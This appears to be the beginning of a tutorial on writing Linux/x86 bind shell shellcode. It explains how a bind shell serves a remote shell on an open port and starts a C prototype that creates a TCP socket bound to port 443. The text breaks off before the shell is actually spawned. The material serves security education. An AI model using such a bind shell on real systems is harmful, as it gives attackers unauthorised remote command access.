
Bind Shell – Shellcode (Linux/x86)
A bind shell is quite common in penetration testing where it is usually combined with an exploit so a tester or assessor could connect to the machine. This basically opens a port and serves a shell as the service running on that specific port in the machine where the code is executed.
First, to be able to create a working "bind shell" shellcode, a C program has been created to test the functionality of the APIs used.
#include <sys/types.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <linux/net.h>
int main()
{
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(443);
addr.sin_addr.s_addr = INADDR_ANY;
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
...